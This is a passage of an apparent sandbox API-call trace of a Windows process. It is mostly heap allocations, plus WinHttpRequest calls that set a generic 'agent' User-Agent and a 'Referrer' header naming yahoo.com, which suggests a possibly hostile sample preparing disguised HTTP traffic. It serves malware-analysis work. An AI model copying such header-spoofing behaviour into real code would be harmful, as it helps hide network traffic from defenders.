lpMem=0xc9a3a8 | out: hHeap=0xb80000) returned 1 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a390 | out: hHeap=0xb80000) returned 1 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd5bfe8 | out: hHeap=0xb80000) returned 1 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ad8 | out: hHeap=0xb80000) returned 1 [0268.192] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a360 | out: hHeap=0xb80000) returned 1 [0268.192] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a378 | out: hHeap=0xb80000) returned 1 [0268.192] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a300 | out: hHeap=0xb80000) returned 1 [0268.192] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe4b0 | out: hHeap=0xb80000) returned 1 [0268.192] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc18d8 | out: hHeap=0xb80000) returned 1 [0268.192] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2e8 | out: hHeap=0xb80000) returned 1 [0268.192] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a78 | out: hHeap=0xb80000) returned 1 [0268.192] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.192] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1a78 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc18d8 [0268.192] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xdfa520 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe4b0 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a3f0 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2e8 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a300 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a378 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a360 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a390 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1ad8 [0268.192] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3a8 [0268.192] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ad8 | out: hHeap=0xb80000) returned 1 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5768 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a510 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a348 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1ad8 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3a8 | out: hHeap=0xb80000) returned 1 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3a8 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ad8 | out: hHeap=0xb80000) returned 1 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a948 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2b8 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3a8 | out: hHeap=0xb80000) returned 1 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2e8 | out: hHeap=0xb80000) returned 1 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a300 | out: hHeap=0xb80000) returned 1 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a360 | out: hHeap=0xb80000) returned 1 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a378 | out: hHeap=0xb80000) returned 1 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a390 | out: hHeap=0xb80000) returned 1 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe4b0 | out: hHeap=0xb80000) returned 1 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a390 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1ad8 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xca79b8 [0268.193] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x22) returned 0xdab940 [0268.193] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xbc3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75efc0*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x75f0c4 | out: rgDispId=0x75f0c4*=2) returned 0x0 [0268.193] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdab940 | out: hHeap=0xb80000) returned 1 [0268.193] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xbc3298, iTInfo=0x0, lcid=0x800, ppTInfo=0x75efb8 | out: ppTInfo=0x75efb8*=0xdb817c) returned 0x0 [0268.194] ITypeInfo:RemoteGetTypeAttr (in: This=0xdb817c, ppTypeAttr=0x75efb0, pDummy=0x356310 | out: ppTypeAttr=0x75efb0, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.194] ITypeInfo:LocalGetIDsOfNames (This=0xdb817c) returned 0x0 [0268.194] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x0, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.194] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd81e78 [0268.194] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x1, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.194] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbbb318 [0268.194] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x2, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.194] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbbb318 [0268.194] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x3, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.194] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd81e78 [0268.194] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x4, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.194] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd81e78 [0268.194] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x5, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.194] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd81e78 [0268.194] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x6, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.194] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.194] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x7, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.194] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd81e78 [0268.194] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x8, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.195] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd81e78 [0268.195] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x9, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.195] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd81e78 [0268.195] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0xa, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.195] ITypeInfo:LocalReleaseTypeAttr (This=0xdb817c) returned 0xd678e0 [0268.195] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd81e78 [0268.195] WinHttpRequest:IUnknown:Release (This=0xdb817c) returned 0x1 [0268.195] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x34) returned 0xdd6018 [0268.195] WinHttpRequest:IDispatch:Invoke (in: This=0xbc3298, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x75f0a8*(rgvarg=([0]=0xdd601c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xdd602c*(varType=0x8, wReserved1=0x0, wReserved2=0x254c, wReserved3=0x2251, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f070, puArgErr=0x75f0b8 | out: pDispParams=0x75f0a8*(rgvarg=([0]=0xdd601c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xdd602c*(varType=0x8, wReserved1=0x0, wReserved2=0x254c, wReserved3=0x2251, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f070*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x75f0b8*=0x2b5995) returned 0x0 [0268.195] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca79b8 | out: hHeap=0xb80000) returned 1 [0268.196] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.196] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2e8 [0268.196] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b48 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdd6018 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a390 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ad8 | out: hHeap=0xb80000) returned 1 [0268.196] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a390 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfa520 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc18d8 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a348 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a510 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2b8 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a948 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5768 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a78 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2e8 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b48 | out: hHeap=0xb80000) returned 1 [0268.196] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a390 | out: hHeap=0xb80000) returned 1 [0268.196] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0268.196] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b48 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a390 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1a78 [0268.197] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a390 | out: hHeap=0xb80000) returned 1 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xdfa520 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5768 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a390 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2e8 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a948 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a2b8 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a510 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a348 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc18d8 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.197] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc18d8 | out: hHeap=0xb80000) returned 1 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5790 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3a8 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a258 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc18d8 [0268.197] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.197] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc18d8 | out: hHeap=0xb80000) returned 1 [0268.197] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a270 [0268.198] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a228 [0268.198] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.198] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2e8 | out: hHeap=0xb80000) returned 1 [0268.198] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a390 | out: hHeap=0xb80000) returned 1 [0268.198] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a948 | out: hHeap=0xb80000) returned 1 [0268.198] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a510 | out: hHeap=0xb80000) returned 1 [0268.198] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2b8 | out: hHeap=0xb80000) returned 1 [0268.198] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a348 | out: hHeap=0xb80000) returned 1 [0268.198] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5768 | out: hHeap=0xb80000) returned 1 [0268.198] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a348 [0268.198] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc18d8 [0268.198] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xca79b8 [0268.198] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x22) returned 0xdab940 [0268.198] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xbc3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75efc0*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x75f0c4 | out: rgDispId=0x75f0c4*=2) returned 0x0 [0268.198] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdab940 | out: hHeap=0xb80000) returned 1 [0268.198] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xbc3298, iTInfo=0x0, lcid=0x800, ppTInfo=0x75efb8 | out: ppTInfo=0x75efb8*=0xdb817c) returned 0x0 [0268.199] ITypeInfo:RemoteGetTypeAttr (in: This=0xdb817c, ppTypeAttr=0x75efb0, pDummy=0x356310 | out: ppTypeAttr=0x75efb0, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalGetIDsOfNames (This=0xdb817c) returned 0x0 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x0, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x1, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbbb318 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x2, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbbb318 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x3, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x4, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x5, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x6, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x7, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x8, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x9, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.199] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0xa, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.199] ITypeInfo:LocalReleaseTypeAttr (This=0xdb817c) returned 0xd678e0 [0268.199] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.199] WinHttpRequest:IUnknown:Release (This=0xdb817c) returned 0x1 [0268.199] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x34) returned 0xdd6018 [0268.200] WinHttpRequest:IDispatch:Invoke (in: This=0xbc3298, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x75f0a8*(rgvarg=([0]=0xdd601c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xdd602c*(varType=0x8, wReserved1=0x0, wReserved2=0x254c, wReserved3=0x2251, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f070, puArgErr=0x75f0b8 | out: pDispParams=0x75f0a8*(rgvarg=([0]=0xdd601c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xdd602c*(varType=0x8, wReserved1=0x0, wReserved2=0x254c, wReserved3=0x2251, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f070*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x75f0b8*=0x2b5995) returned 0x0 [0268.200] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca79b8 | out: hHeap=0xb80000) returned 1 [0268.200] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a510 [0268.200] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a948 [0268.200] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1ad8 [0268.200] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdd6018 | out: hHeap=0xb80000) returned 1 [0268.200] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a348 | out: hHeap=0xb80000) returned 1 [0268.200] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc18d8 | out: hHeap=0xb80000) returned 1 [0268.200] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a348 [0268.200] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a510 | out: hHeap=0xb80000) returned 1 [0268.200] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfa520 | out: hHeap=0xb80000) returned 1 [0268.200] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a78 | out: hHeap=0xb80000) returned 1 [0268.201] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a258 | out: hHeap=0xb80000) returned 1 [0268.201] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3a8 | out: hHeap=0xb80000) returned 1 [0268.201] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a228 | out: hHeap=0xb80000) returned 1 [0268.201] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a270 | out: hHeap=0xb80000) returned 1 [0268.201] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5790 | out: hHeap=0xb80000) returned 1 [0268.201] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b48 | out: hHeap=0xb80000) returned 1 [0268.201] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a948 | out: hHeap=0xb80000) returned 1 [0268.201] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ad8 | out: hHeap=0xb80000) returned 1 [0268.201] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a348 | out: hHeap=0xb80000) returned 1 [0268.201] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0268.201] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1ad8 [0268.201] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a348 [0268.201] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b48 [0268.201] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a348 | out: hHeap=0xb80000) returned 1 [0268.201] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xdfa520 [0268.201] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5790 [0268.201] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a348 [0268.201] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a948 [0268.201] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a270 [0268.201] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a228 [0268.201] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3a8 [0268.201] 